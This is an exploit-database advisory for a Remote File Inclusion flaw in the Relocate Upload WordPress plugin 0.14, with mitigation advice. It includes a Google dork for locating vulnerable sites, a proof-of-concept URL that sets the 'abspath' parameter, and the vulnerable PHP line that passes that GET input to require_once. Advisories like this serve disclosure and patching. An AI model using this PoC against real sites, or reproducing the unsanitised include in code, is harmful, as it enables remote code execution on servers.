Relocate Upload Wordpress plugin RFI

vendor:

Relocate Upload Plugin

by:

Ben Schmidt

9.3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Relocate Upload Plugin

Affected Version From: 0.14

Affected Version To: 0.14

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Relocate Upload WordPress plugin RFI

The Relocate Upload Wordpress plugin is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can send a malicious request to the relocate-upload.php script with a crafted URL containing an arbitrary file path in the 'abspath' parameter. This allows the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of the Relocate Upload plugin. Additionally, the web server should be configured to only allow requests to the relocate-upload.php script from trusted sources.

Source

Exploit-DB raw data:

# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{       // WP setup and function access
        define('WP_USE_THEMES', false);
        require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter